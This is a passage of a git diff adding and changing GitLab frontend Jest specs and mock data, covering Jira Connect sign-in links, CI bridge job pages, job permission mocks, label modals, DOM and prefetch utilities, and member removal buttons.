searchProjectsQueryResponse = { data: { group: { + id: '1', projects: { nodes: [project1, project2, project3], }, @@ -297,6 +301,7 @@ export const searchProjectsQueryResponse = { export const emptySearchProjectsQueryResponse = { data: { group: { + id: '1', projects: { nodes: [], }, diff --git a/spec/frontend/jira_connect/subscriptions/components/app_spec.js b/spec/frontend/jira_connect/subscriptions/components/app_spec.js index 8e464968453..47fe96262ee 100644 --- a/spec/frontend/jira_connect/subscriptions/components/app_spec.js +++ b/spec/frontend/jira_connect/subscriptions/components/app_spec.js @@ -5,6 +5,7 @@ import JiraConnectApp from '~/jira_connect/subscriptions/components/app.vue'; import AddNamespaceButton from '~/jira_connect/subscriptions/components/add_namespace_button.vue'; import SignInButton from '~/jira_connect/subscriptions/components/sign_in_button.vue'; import SubscriptionsList from '~/jira_connect/subscriptions/components/subscriptions_list.vue'; +import UserLink from '~/jira_connect/subscriptions/components/user_link.vue'; import createStore from '~/jira_connect/subscriptions/store'; import { SET_ALERT } from '~/jira_connect/subscriptions/store/mutation_types'; import { __ } from '~/locale'; @@ -12,6 +13,7 @@ import { mockSubscription } from '../mock_data'; jest.mock('~/jira_connect/subscriptions/utils', () => ({ retrieveAlert: jest.fn().mockReturnValue({ message: 'error message' }), + getGitlabSignInURL: jest.fn(), })); describe('JiraConnectApp', () => { @@ -83,6 +85,22 @@ describe('JiraConnectApp', () => { }); }, ); + + it('renders UserLink component', () => { + createComponent({ + provide: { + usersPath: '/user', + subscriptions: [], + }, + }); + + const userLink = wrapper.findComponent(UserLink); + expect(userLink.exists()).toBe(true); + expect(userLink.props()).toEqual({ + hasSubscriptions: false, + userSignedIn: false, + }); + }); }); describe('alert', () => { diff --git a/spec/frontend/jira_connect/subscriptions/components/user_link_spec.js b/spec/frontend/jira_connect/subscriptions/components/user_link_spec.js new file mode 100644 index 00000000000..b98a36269a3 --- /dev/null +++ b/spec/frontend/jira_connect/subscriptions/components/user_link_spec.js @@ -0,0 +1,91 @@ +import { GlSprintf } from '@gitlab/ui'; +import UserLink from '~/jira_connect/subscriptions/components/user_link.vue'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; +import waitForPromises from 'helpers/wait_for_promises'; + +jest.mock('~/jira_connect/subscriptions/utils', () => ({ + getGitlabSignInURL: jest.fn().mockImplementation((path) => Promise.resolve(path)), +})); + +describe('SubscriptionsList', () => { + let wrapper; + + const createComponent = (propsData = {}, { provide } = {}) => { + wrapper = shallowMountExtended(UserLink, { + propsData, + provide, + stubs: { + GlSprintf, + }, + }); + }; + + const findSignInLink = () => wrapper.findByTestId('sign-in-link'); + const findGitlabUserLink = () => wrapper.findByTestId('gitlab-user-link'); + const findSprintf = () => wrapper.findComponent(GlSprintf); + + afterEach(() => { + wrapper.destroy(); + }); + + describe.each` + userSignedIn | hasSubscriptions | expectGlSprintf | expectGlLink + ${true} | ${false} | ${true} | ${false} + ${false} | ${true} | ${false} | ${true} + ${true} | ${true} | ${true} | ${false} + ${false} | ${false} | ${false} | ${false} + `( + 'when `userSignedIn` is $userSignedIn and `hasSubscriptions` is $hasSubscriptions', + ({ userSignedIn, hasSubscriptions, expectGlSprintf, expectGlLink }) => { + it('renders template correctly', () => { + createComponent({ + userSignedIn, + hasSubscriptions, + }); + + expect(findSprintf().exists()).toBe(expectGlSprintf); + expect(findSignInLink().exists()).toBe(expectGlLink); + }); + }, + ); + + describe('sign in link', () => { + it('renders with correct href', async () => { + const mockUsersPath = '/user'; + createComponent( + { + userSignedIn: false, + hasSubscriptions: true, + }, + { provide: { usersPath: mockUsersPath } }, + ); + + await waitForPromises(); + + expect(findSignInLink().exists()).toBe(true); + expect(findSignInLink().attributes('href')).toBe(mockUsersPath); + }); + }); + + describe('gitlab user link', () => { + window.gon = { current_username: 'root' }; + + beforeEach(() => { + createComponent( + { + userSignedIn: true, + hasSubscriptions: true, + }, + { provide: { gitlabUserPath: '/root' } }, + ); + }); + + it('renders with correct href', () => { + expect(findGitlabUserLink().attributes('href')).toBe('/root'); + }); + + it('contains GitLab user handle', () => { + expect(findGitlabUserLink().text()).toBe('@root'); + }); + }); +}); diff --git a/spec/frontend/jira_connect/subscriptions/index_spec.js b/spec/frontend/jira_connect/subscriptions/index_spec.js deleted file mode 100644 index b97918a198e..00000000000 --- a/spec/frontend/jira_connect/subscriptions/index_spec.js +++ /dev/null @@ -1,36 +0,0 @@ -import { initJiraConnect } from '~/jira_connect/subscriptions'; -import { getGitlabSignInURL } from '~/jira_connect/subscriptions/utils'; - -jest.mock('~/jira_connect/subscriptions/utils'); - -describe('initJiraConnect', () => { - const mockInitialHref = 'https://gitlab.com'; - - beforeEach(() => { - setFixtures(` - <a class="js-jira-connect-sign-in" href="${mockInitialHref}">Sign In</a> - <a class="js-jira-connect-sign-in" href="${mockInitialHref}">Another Sign In</a> - `); - }); - - const assertSignInLinks = (expectedLink) => { - Array.from(document.querySelectorAll('.js-jira-connect-sign-in')).forEach((el) => { - expect(el.getAttribute('href')).toBe(expectedLink); - }); - }; - - describe('Sign in links', () => { - it('are updated on initialization', async () => { - const mockSignInLink = `https://gitlab.com?return_to=${encodeURIComponent('/test/location')}`; - getGitlabSignInURL.mockResolvedValue(mockSignInLink); - - // assert the initial state - assertSignInLinks(mockInitialHref); - - await initJiraConnect(); - - // assert the update has occurred - assertSignInLinks(mockSignInLink); - }); - }); -}); diff --git a/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap b/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap index 9f5b772a5c7..a72528ae36b 100644 --- a/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap +++ b/spec/frontend/jira_import/components/__snapshots__/jira_import_form_spec.js.snap @@ -152,7 +152,7 @@ exports[`JiraImportForm table body shows correct information in each cell 1`] = aria-label="Search" class="gl-form-input gl-search-box-by-type-input form-control" placeholder="Search" - type="text" + type="search" /> <div @@ -283,7 +283,7 @@ exports[`JiraImportForm table body shows correct information in each cell 1`] = aria-label="Search" class="gl-form-input gl-search-box-by-type-input form-control" placeholder="Search" - type="text" + type="search" /> <div diff --git a/spec/frontend/jobs/bridge/app_spec.js b/spec/frontend/jobs/bridge/app_spec.js new file mode 100644 index 00000000000..0e232ab240d --- /dev/null +++ b/spec/frontend/jobs/bridge/app_spec.js @@ -0,0 +1,33 @@ +import { shallowMount } from '@vue/test-utils'; +import BridgeApp from '~/jobs/bridge/app.vue'; +import BridgeEmptyState from '~/jobs/bridge/components/empty_state.vue'; +import BridgeSidebar from '~/jobs/bridge/components/sidebar.vue'; + +describe('Bridge Show Page', () => { + let wrapper; + + const createComponent = () => { + wrapper = shallowMount(BridgeApp, {}); + }; + + const findEmptyState = () => wrapper.findComponent(BridgeEmptyState); + const findSidebar = () => wrapper.findComponent(BridgeSidebar); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('template', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders empty state', () => { + expect(findEmptyState().exists()).toBe(true); + }); + + it('renders sidebar', () => { + expect(findSidebar().exists()).toBe(true); + }); + }); +}); diff --git a/spec/frontend/jobs/bridge/components/empty_state_spec.js b/spec/frontend/jobs/bridge/components/empty_state_spec.js new file mode 100644 index 00000000000..83642450118 --- /dev/null +++ b/spec/frontend/jobs/bridge/components/empty_state_spec.js @@ -0,0 +1,59 @@ +import { GlButton } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import BridgeEmptyState from '~/jobs/bridge/components/empty_state.vue'; +import { MOCK_EMPTY_ILLUSTRATION_PATH, MOCK_PATH_TO_DOWNSTREAM } from '../mock_data'; + +describe('Bridge Empty State', () => { + let wrapper; + + const createComponent = (props) => { + wrapper = shallowMount(BridgeEmptyState, { + provide: { + emptyStateIllustrationPath: MOCK_EMPTY_ILLUSTRATION_PATH, + }, + propsData: { + downstreamPipelinePath: MOCK_PATH_TO_DOWNSTREAM, + ...props, + }, + }); + }; + + const findSvg = () => wrapper.find('img'); + const findTitle = () => wrapper.find('h1'); + const findLinkBtn = () => wrapper.findComponent(GlButton); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('template', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders illustration', () => { + expect(findSvg().exists()).toBe(true); + }); + + it('renders title', () => { + expect(findTitle().exists()).toBe(true); + expect(findTitle().text()).toBe(wrapper.vm.$options.i18n.title); + }); + + it('renders CTA button', () => { + expect(findLinkBtn().exists()).toBe(true); + expect(findLinkBtn().text()).toBe(wrapper.vm.$options.i18n.linkBtnText); + expect(findLinkBtn().attributes('href')).toBe(MOCK_PATH_TO_DOWNSTREAM); + }); + }); + + describe('without downstream pipeline', () => { + beforeEach(() => { + createComponent({ downstreamPipelinePath: undefined }); + }); + + it('does not render CTA button', () => { + expect(findLinkBtn().exists()).toBe(false); + }); + }); +}); diff --git a/spec/frontend/jobs/bridge/components/sidebar_spec.js b/spec/frontend/jobs/bridge/components/sidebar_spec.js new file mode 100644 index 00000000000..ba4018753af --- /dev/null +++ b/spec/frontend/jobs/bridge/components/sidebar_spec.js @@ -0,0 +1,76 @@ +import { GlButton, GlDropdown } from '@gitlab/ui'; +import { GlBreakpointInstance } from '@gitlab/ui/dist/utils'; +import { nextTick } from 'vue'; +import { shallowMount } from '@vue/test-utils'; +import BridgeSidebar from '~/jobs/bridge/components/sidebar.vue'; +import { BUILD_NAME } from '../mock_data'; + +describe('Bridge Sidebar', () => { + let wrapper; + + const createComponent = () => { + wrapper = shallowMount(BridgeSidebar, { + provide: { + buildName: BUILD_NAME, + }, + }); + }; + + const findSidebar = () => wrapper.find('aside'); + const findRetryDropdown = () => wrapper.find(GlDropdown); + const findToggle = () => wrapper.find(GlButton); + + afterEach(() => { + wrapper.destroy(); + }); + + describe('template', () => { + beforeEach(() => { + createComponent(); + }); + + it('renders retry dropdown', () => { + expect(findRetryDropdown().exists()).toBe(true); + }); + }); + + describe('sidebar expansion', () => { + beforeEach(() => { + createComponent(); + }); + + it('toggles expansion on button click', async () => { + expect(findSidebar().classes()).not.toContain('gl-display-none'); + + findToggle().vm.$emit('click'); + await nextTick(); + + expect(findSidebar().classes()).toContain('gl-display-none'); + }); + + describe('on resize', () => { + it.each` + breakpoint | isSidebarExpanded + ${'xs'} | ${false} + ${'sm'} | ${false} + ${'md'} | ${true} + ${'lg'} | ${true} + ${'xl'} | ${true} + `( + 'sets isSidebarExpanded to `$isSidebarExpanded` when the breakpoint is "$breakpoint"', + async ({ breakpoint, isSidebarExpanded }) => { + jest.spyOn(GlBreakpointInstance, 'getBreakpointSize').mockReturnValue(breakpoint); + + window.dispatchEvent(new Event('resize')); + await nextTick(); + + if (isSidebarExpanded) { + expect(findSidebar().classes()).not.toContain('gl-display-none'); + } else { + expect(findSidebar().classes()).toContain('gl-display-none'); + } + }, + ); + }); + }); +}); diff --git a/spec/frontend/jobs/bridge/mock_data.js b/spec/frontend/jobs/bridge/mock_data.js new file mode 100644 index 00000000000..146d1a062ac --- /dev/null +++ b/spec/frontend/jobs/bridge/mock_data.js @@ -0,0 +1,3 @@ +export const MOCK_EMPTY_ILLUSTRATION_PATH = '/path/to/svg'; +export const MOCK_PATH_TO_DOWNSTREAM = '/path/to/downstream/pipeline'; +export const BUILD_NAME = 'Child Pipeline Trigger'; diff --git a/spec/frontend/jobs/components/job_sidebar_details_container_spec.js b/spec/frontend/jobs/components/job_sidebar_details_container_spec.js index ad0368555fa..cc9a5e4ee25 100644 --- a/spec/frontend/jobs/components/job_sidebar_details_container_spec.js +++ b/spec/frontend/jobs/components/job_sidebar_details_container_spec.js @@ -56,7 +56,7 @@ describe('Job Sidebar Details Container', () => { beforeEach(createWrapper); it.each([ - ['duration', 'Duration: 6 seconds'], + ['duration', 'Elapsed time: 6 seconds'], ['erased_at', 'Erased: 3 weeks ago'], ['finished_at', 'Finished: 3 weeks ago'], ['queued', 'Queued: 9 seconds'], @@ -86,6 +86,15 @@ describe('Job Sidebar Details Container', () => { expect(findAllDetailsRow()).toHaveLength(7); }); + + describe('duration row', () => { + it('renders all the details components', async () => { + createWrapper(); + await store.dispatch('receiveJobSuccess', job); + + expect(findAllDetailsRow().at(0).text()).toBe('Duration: 6 seconds'); + }); + }); }); describe('timeout', () => { diff --git a/spec/frontend/jobs/components/table/cells/actions_cell_spec.js b/spec/frontend/jobs/components/table/cells/actions_cell_spec.js index 1b1e2d4df8f..6caf36e1461 100644 --- a/spec/frontend/jobs/components/table/cells/actions_cell_spec.js +++ b/spec/frontend/jobs/components/table/cells/actions_cell_spec.js @@ -5,7 +5,14 @@ import ActionsCell from '~/jobs/components/table/cells/actions_cell.vue'; import JobPlayMutation from '~/jobs/components/table/graphql/mutations/job_play.mutation.graphql'; import JobRetryMutation from '~/jobs/components/table/graphql/mutations/job_retry.mutation.graphql'; import JobUnscheduleMutation from '~/jobs/components/table/graphql/mutations/job_unschedule.mutation.graphql'; -import { playableJob, retryableJob, scheduledJob } from '../../../mock_data'; +import { + playableJob, + retryableJob, + scheduledJob, + cannotRetryJob, + cannotPlayJob, + cannotPlayScheduledJob, +} from '../../../mock_data'; describe('Job actions cell', () => { let wrapper; @@ -51,6 +58,14 @@ describe('Job actions cell', () => { wrapper.destroy(); }); + it('displays the artifacts download button with correct link', () => { + createComponent(playableJob); + + expect(findDownloadArtifactsButton().attributes('href')).toBe( + playableJob.artifacts.nodes[0].downloadPath, + ); + }); + it('does not display an artifacts download button', () => { createComponent(retryableJob); @@ -58,6 +73,17 @@ describe('Job actions cell', () => { }); it.each` + button | action | jobType + ${findPlayButton} | ${'play'} | ${cannotPlayJob} + ${findRetryButton} | ${'retry'} | ${cannotRetryJob} + ${findPlayScheduledJobButton} | ${'play scheduled'} | ${cannotPlayScheduledJob} + `('does not display the $action button if user cannot update build', ({ button, jobType }) => { + createComponent(jobType); + + expect(button().exists()).toBe(false); + }); + + it.each` button | action | jobType ${findPlayButton} | ${'play'} | ${playableJob} ${findRetryButton} | ${'retry'} | ${retryableJob} diff --git a/spec/frontend/jobs/mock_data.js b/spec/frontend/jobs/mock_data.js index 43755b46bc9..45d297ba364 100644 --- a/spec/frontend/jobs/mock_data.js +++ b/spec/frontend/jobs/mock_data.js @@ -1474,6 +1474,7 @@ export const mockJobsInTable = [ export const mockJobsQueryResponse = { data: { project: { + id: '1', jobs: { pageInfo: { endCursor: 'eyJpZCI6IjIzMTcifQ', @@ -1488,15 +1489,18 @@ export const mockJobsQueryResponse = { nodes: [ { downloadPath: '/root/ci-project/-/jobs/2336/artifacts/download?file_type=trace', + fileType: 'TRACE', __typename: 'CiJobArtifact', }, { downloadPath: '/root/ci-project/-/jobs/2336/artifacts/download?file_type=metadata', + fileType: 'METADATA', __typename: 'CiJobArtifact', }, { downloadPath: '/root/ci-project/-/jobs/2336/artifacts/download?file_type=archive', + fileType: 'ARCHIVE', __typename: 'CiJobArtifact', }, ], @@ -1509,6 +1513,7 @@ export const mockJobsQueryResponse = { triggered: null, createdByTag: false, detailedStatus: { + id: 'status-1', detailsPath: '/root/ci-project/-/jobs/2336', group: 'success', icon: 'status_success', @@ -1516,6 +1521,7 @@ export const mockJobsQueryResponse = { text: 'passed', tooltip: 'passed', action: { + id: 'action-1', buttonTitle: 'Retry this job', icon: 'retry', method: 'post', @@ -1535,6 +1541,7 @@ export const mockJobsQueryResponse = { id: 'gid://gitlab/Ci::Pipeline/473', path: '/root/ci-project/-/pipelines/473', user: { + id: 'user-1', webPath: '/root', avatarUrl: 'https://www.gravatar.com/avatar/e64c7d89f26bd1972efa854d13d7dd61?s=80&d=identicon', @@ -1543,6 +1550,7 @@ export const mockJobsQueryResponse = { __typename: 'Pipeline', }, stage: { + id: 'stage-1', name: 'deploy', __typename: 'CiStage', }, @@ -1558,6 +1566,7 @@ export const mockJobsQueryResponse = { userPermissions: { readBuild: true, readJobArtifacts: true, + updateBuild: true, __typename: 'JobPermissions', }, __typename: 'CiJob', @@ -1573,13 +1582,23 @@ export const mockJobsQueryResponse = { export const mockJobsQueryEmptyResponse = { data: { project: { + id: '1', jobs: [], }, }, }; export const retryableJob = { - artifacts: { nodes: [], __typename: 'CiJobArtifactConnection' }, + artifacts: { + nodes: [ + { + downloadPath: '/root/ci-project/-/jobs/847/artifacts/download?file_type=trace', + fileType: 'TRACE', + __typename: 'CiJobArtifact', + }, + ], + __typename: 'CiJobArtifactConnection', + }, allowFailure: false, status: 'SUCCESS', scheduledAt: null, @@ -1630,15 +1649,31 @@ export const retryableJob = { cancelable: false, active: false, stuck: false, - userPermissions: { readBuild: true, __typename: 'JobPermissions' }, + userPermissions: { readBuild: true, updateBuild: true, __typename: 'JobPermissions' }, __typename: 'CiJob', }; +export const cannotRetryJob = { + ...retryableJob, + userPermissions: { readBuild: true, updateBuild: false, __typename: 'JobPermissions' }, +}; + export const playableJob = { artifacts: { nodes: [ { - downloadPath: '/root/test-job-artifacts/-/jobs/1982/artifacts/download?file_type=trace', + downloadPath: '/root/ci-project/-/jobs/621/artifacts/download?file_type=archive', + fileType: 'ARCHIVE', + __typename: 'CiJobArtifact', + }, + { + downloadPath: '/root/ci-project/-/jobs/621/artifacts/download?file_type=metadata', + fileType: 'METADATA', + __typename: 'CiJobArtifact', + }, + { + downloadPath: '/root/ci-project/-/jobs/621/artifacts/download?file_type=trace', + fileType: 'TRACE', __typename: 'CiJobArtifact', }, ], @@ -1694,10 +1729,25 @@ export const playableJob = { cancelable: false, active: false, stuck: false, - userPermissions: { readBuild: true, readJobArtifacts: true, __typename: 'JobPermissions' }, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: true, + __typename: 'JobPermissions', + }, __typename: 'CiJob', }; +export const cannotPlayJob = { + ...playableJob, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: false, + __typename: 'JobPermissions', + }, +}; + export const scheduledJob = { artifacts: { nodes: [], __typename: 'CiJobArtifactConnection' }, allowFailure: false, @@ -1750,6 +1800,16 @@ export const scheduledJob = { cancelable: false, active: false, stuck: false, - userPermissions: { readBuild: true, __typename: 'JobPermissions' }, + userPermissions: { readBuild: true, updateBuild: true, __typename: 'JobPermissions' }, __typename: 'CiJob', }; + +export const cannotPlayScheduledJob = { + ...scheduledJob, + userPermissions: { + readBuild: true, + readJobArtifacts: true, + updateBuild: false, + __typename: 'JobPermissions', + }, +}; diff --git a/spec/frontend/vue_shared/components/delete_label_modal_spec.js b/spec/frontend/labels/components/delete_label_modal_spec.js index 3905690dab4..6204138f885 100644 --- a/spec/frontend/vue_shared/components/delete_label_modal_spec.js +++ b/spec/frontend/labels/components/delete_label_modal_spec.js @@ -3,7 +3,7 @@ import { mount } from '@vue/test-utils'; import { stubComponent } from 'helpers/stub_component'; import { TEST_HOST } from 'helpers/test_constants'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import DeleteLabelModal from '~/vue_shared/components/delete_label_modal.vue'; +import DeleteLabelModal from '~/labels/components/delete_label_modal.vue'; const MOCK_MODAL_DATA = { labelName: 'label 1', @@ -11,7 +11,7 @@ const MOCK_MODAL_DATA = { destroyPath: `${TEST_HOST}/1`, }; -describe('vue_shared/components/delete_label_modal', () => { +describe('~/labels/components/delete_label_modal', () => { let wrapper; const createComponent = () => { diff --git a/spec/frontend/pages/labels/components/promote_label_modal_spec.js b/spec/frontend/labels/components/promote_label_modal_spec.js index 4d5d1f98b59..d2fbdfc9a8d 100644 --- a/spec/frontend/pages/labels/components/promote_label_modal_spec.js +++ b/spec/frontend/labels/components/promote_label_modal_spec.js @@ -2,8 +2,8 @@ import Vue from 'vue'; import { TEST_HOST } from 'helpers/test_constants'; import mountComponent from 'helpers/vue_mount_component_helper'; import axios from '~/lib/utils/axios_utils'; -import promoteLabelModal from '~/pages/projects/labels/components/promote_label_modal.vue'; -import eventHub from '~/pages/projects/labels/event_hub'; +import promoteLabelModal from '~/labels/components/promote_label_modal.vue'; +import eventHub from '~/labels/event_hub'; describe('Promote label modal', () => { let vm; diff --git a/spec/frontend/delete_label_modal_spec.js b/spec/frontend/labels/delete_label_modal_spec.js index 0b3e6fe652a..c1e6ce87990 100644 --- a/spec/frontend/delete_label_modal_spec.js +++ b/spec/frontend/labels/delete_label_modal_spec.js @@ -1,5 +1,5 @@ import { TEST_HOST } from 'helpers/test_constants'; -import initDeleteLabelModal from '~/delete_label_modal'; +import { initDeleteLabelModal } from '~/labels'; describe('DeleteLabelModal', () => { const buttons = [ diff --git a/spec/frontend/labels_select_spec.js b/spec/frontend/labels/labels_select_spec.js index cbc9a923f8b..f6e280564cc 100644 --- a/spec/frontend/labels_select_spec.js +++ b/spec/frontend/labels/labels_select_spec.js @@ -1,5 +1,5 @@ import $ from 'jquery'; -import LabelsSelect from '~/labels_select'; +import LabelsSelect from '~/labels/labels_select'; const mockUrl = '/foo/bar/url'; diff --git a/spec/frontend/lib/utils/common_utils_spec.js b/spec/frontend/lib/utils/common_utils_spec.js index de1be5bc337..3e2ba918d9b 100644 --- a/spec/frontend/lib/utils/common_utils_spec.js +++ b/spec/frontend/lib/utils/common_utils_spec.js @@ -1040,4 +1040,15 @@ describe('common_utils', () => { expect(result).toEqual(['hello', 'helloWorld']); }); }); + + describe('convertArrayOfObjectsToCamelCase', () => { + it('returns a new array with snake_case object property names converted camelCase', () => { + const result = commonUtils.convertArrayOfObjectsToCamelCase([ + { hello: '' }, + { hello_world: '' }, + ]); + + expect(result).toEqual([{ hello: '' }, { helloWorld: '' }]); + }); + }); }); diff --git a/spec/frontend/lib/utils/dom_utils_spec.js b/spec/frontend/lib/utils/dom_utils_spec.js index cb8b1c7ca9a..2f240f25d2a 100644 --- a/spec/frontend/lib/utils/dom_utils_spec.js +++ b/spec/frontend/lib/utils/dom_utils_spec.js @@ -6,6 +6,7 @@ import { isElementVisible, isElementHidden, getParents, + setAttributes, } from '~/lib/utils/dom_utils'; const TEST_MARGIN = 5; @@ -208,4 +209,15 @@ describe('DOM Utils', () => { ]); }); }); + + describe('setAttributes', () => { + it('sets multiple attribues on element', () => { + const div = document.createElement('div'); + + setAttributes(div, { class: 'test', title: 'another test' }); + + expect(div.getAttribute('class')).toBe('test'); + expect(div.getAttribute('title')).toBe('another test'); + }); + }); }); diff --git a/spec/frontend/lib/utils/intersection_observer_spec.js b/spec/frontend/lib/utils/intersection_observer_spec.js new file mode 100644 index 00000000000..71b1daffe0d --- /dev/null +++ b/spec/frontend/lib/utils/intersection_observer_spec.js @@ -0,0 +1,86 @@ +import { create } from '~/lib/utils/intersection_observer'; + +describe('IntersectionObserver Utility', () => { + beforeAll(() => { + global.IntersectionObserver = class MockIntersectionObserver { + constructor(callback) { + this.callback = callback; + + this.entries = []; + } + + addEntry(entry) { + this.entries.push(entry); + } + + trigger() { + this.callback(this.entries); + } + }; + }); + describe('create', () => { + describe('memoization', () => { + const options = { rootMargin: '1px 1px 1px 1px' }; + let expectedOutput; + + beforeEach(() => { + create.cache.clear(); + expectedOutput = create(options); + }); + + it('returns the same Observer for the same options input', () => { + expect(expectedOutput.id).toBe(create(options).id); + }); + + it('creates a new Observer for unique input options', () => { + expect(expectedOutput.id).not.toBe(create({ rootMargin: '1px 2px 3px 4px' })); + }); + + it('creates a new Observer for the same input options in different object references', () => { + expect(expectedOutput.id).not.toBe(create({ rootMargin: '1px 1px 1px 1px' })); + }); + }); + }); + + describe('Observer behavior', () => { + let observer = null; + let id = null; + + beforeEach(() => { + create.cache.clear(); + ({ observer, id } = create()); + }); + + it.each` + isIntersecting | event + ${false} | ${'IntersectionDisappear'} + ${true} | ${'IntersectionAppear'} + `( + 'should emit the correct event on the entry target based on the computed Intersection', + async ({ isIntersecting, event }) => { + const target = document.createElement('div'); + observer.addEntry({ target, isIntersecting }); + + target.addEventListener(event, (e) => { + expect(e.detail.observer).toBe(id); + }); + + observer.trigger(); + }, + ); + + it('should always emit an Update event with the entry and the observer', () => { + const target = document.createElement('div'); + const entry = { target }; + + observer.addEntry(entry); + + target.addEventListener('IntersectionUpdate', (e) => { + expect(e.detail.observer).toBe(id); + expect(e.detail.entry).toStrictEqual(entry); + }); + + observer.trigger(); + }); + }); +}); diff --git a/spec/frontend/lib/utils/navigation_utility_spec.js b/spec/frontend/lib/utils/navigation_utility_spec.js index 88172f38894..6a880a0f354 100644 --- a/spec/frontend/lib/utils/navigation_utility_spec.js +++ b/spec/frontend/lib/utils/navigation_utility_spec.js @@ -1,4 +1,5 @@ import findAndFollowLink from '~/lib/utils/navigation_utility'; +import * as navigationUtils from '~/lib/utils/navigation_utility'; import { visitUrl } from '~/lib/utils/url_utility'; jest.mock('~/lib/utils/url_utility'); @@ -21,3 +22,91 @@ describe('findAndFollowLink', () => { expect(visitUrl).not.toHaveBeenCalled(); }); }); + +describe('prefetchDocument', () => { + it('creates a prefetch link tag', () => { + const linkElement = document.createElement('link'); + + jest.spyOn(document, 'createElement').mockImplementation(() => linkElement); + jest.spyOn(document.head, 'appendChild'); + + navigationUtils.prefetchDocument('index.htm'); + + expect(document.head.appendChild).toHaveBeenCalledWith(linkElement); + expect(linkElement.href).toEqual('http://test.host/index.htm'); + expect(linkElement.rel).toEqual('prefetch'); + expect(linkElement.getAttribute('as')).toEqual('document'); + }); +}); + +describe('initPrefetchLinks', () => { + let newLink; + + beforeEach(() => { + newLink = document.createElement('a'); + newLink.href = 'index_prefetch.htm'; + newLink.classList.add('js-test-prefetch-link'); + document.body.appendChild(newLink); + }); + + it('adds to all links mouse out handlers when hovered', () => { + const mouseOverEvent = new Event('mouseover'); + + jest.spyOn(newLink, 'addEventListener'); + + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + + expect(newLink.addEventListener).toHaveBeenCalled(); + }); + + it('it is not fired when less then 100ms over link', () => { + const mouseOverEvent = new Event('mouseover'); + const mouseOutEvent = new Event('mouseout'); + + jest.spyOn(newLink, 'addEventListener'); + jest.spyOn(navigationUtils, 'prefetchDocument').mockImplementation(() => true); + + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + newLink.dispatchEvent(mouseOutEvent); + + expect(navigationUtils.prefetchDocument).not.toHaveBeenCalled(); + }); + + describe('executes correctly when hovering long enough', () => { + const mouseOverEvent = new Event('mouseover'); + + beforeEach(() => { + jest.useFakeTimers(); + + jest.spyOn(global, 'setTimeout'); + jest.spyOn(newLink, 'removeEventListener'); + }); + + it('calls prefetchDocument which adds to document', () => { + jest.spyOn(document.head, 'appendChild'); + + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + + jest.runAllTimers(); + + expect(setTimeout).toHaveBeenCalledWith(expect.any(Function), 100); + expect(document.head.appendChild).toHaveBeenCalled(); + }); + + it('removes Event Listener when fired so only done once', () => { + navigationUtils.initPrefetchLinks('.js-test-prefetch-link'); + newLink.dispatchEvent(mouseOverEvent); + + jest.runAllTimers(); + + expect(newLink.removeEventListener).toHaveBeenCalledWith( + 'mouseover', + expect.any(Function), + true, + ); + }); + }); +}); diff --git a/spec/frontend/members/components/action_buttons/remove_member_button_spec.js b/spec/frontend/members/components/action_buttons/remove_member_button_spec.js index 7eb0ea37fe6..1a031cc56d6 100644 --- a/spec/frontend/members/components/action_buttons/remove_member_button_spec.js +++ b/spec/frontend/members/components/action_buttons/remove_member_button_spec.js @@ -54,6 +54,8 @@ describe('RemoveMemberButton', () => { }); }; + const findButton = () => wrapper.findComponent(GlButton); + beforeEach(() => { createComponent(); }); @@ -66,7 +68,6 @@ describe('RemoveMemberButton', () => { expect(wrapper.attributes()).toMatchObject({ 'aria-label': 'Remove member', title: 'Remove member', - icon: 'remove', }); }); @@ -75,8 +76,22 @@ describe('RemoveMemberButton', () => { }); it('calls Vuex action to show `remove member` modal when clicked', () => { - wrapper.findComponent(GlButton).vm.$emit('click'); + findButton().vm.$emit('click'); expect(actions.showRemoveMemberModal).toHaveBeenCalledWith(expect.any(Object), modalData); }); + + describe('button optional properties', () => { + it('has default value for category and text', () => { + createComponent(); + expect(findButton().props('category')).toBe('secondary'); + expect(findButton().text()).toBe(''); + }); + + it('allow changing value of button category and text', () => { + createComponent({ buttonCategory: 'primary', buttonText: 'Decline request' }); + expect(findButton().props('category')).toBe('primary'); + expect(findButton().text()).toBe('Decline request'); + }); + }); }); diff --git a/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js b/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js index 10e451376c8..356df7e7b11 100644 --- a/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js +++ b/spec/frontend/members/components/action_buttons/user_action_buttons_spec.js @@ -13,6 +13,7 @@ describe('UserActionButtons', () => { propsData: { member, isCurrentUser: false, + isInvitedUser: false, ...propsData, }, }); @@ -45,7 +46,9 @@ describe('UserActionButtons', () => { title: 'Remove member', isAccessRequest: false, isInvite: false, - icon: 'remove', + icon: '', + buttonCategory: 'secondary', + buttonText: 'Remove user', userDeletionObstacles: { name: member.user.name, obstacles: parseUserDeletionObstacles(member.user), @@ -129,4 +132,30 @@ describe('UserActionButtons', () => { expect(findRemoveMemberButton().props().memberType).toBe('ProjectMember'); }); }); + + describe('isInvitedUser', () => { + it.each` + isInvitedUser | icon | buttonText | buttonCategory + ${true} | ${'remove'} | ${null} | ${'primary'} + ${false} | ${''} | ${'Remove user'} | ${'secondary'} + `( + 'passes the correct props to remove-member-button when isInvitedUser is $isInvitedUser', + ({ isInvitedUser, icon, buttonText, buttonCategory }) => { + createComponent({ + isInvitedUser, + permissions: { + canRemove: true, + }, + }); + + expect(findRemoveMemberButton().props()).toEqual( + expect.objectContaining({ + icon, + buttonText, + buttonCategory, + }), + ); + }, + ); + }); }); diff --git a/spec/frontend/members/components/table/member_action_buttons_spec.js 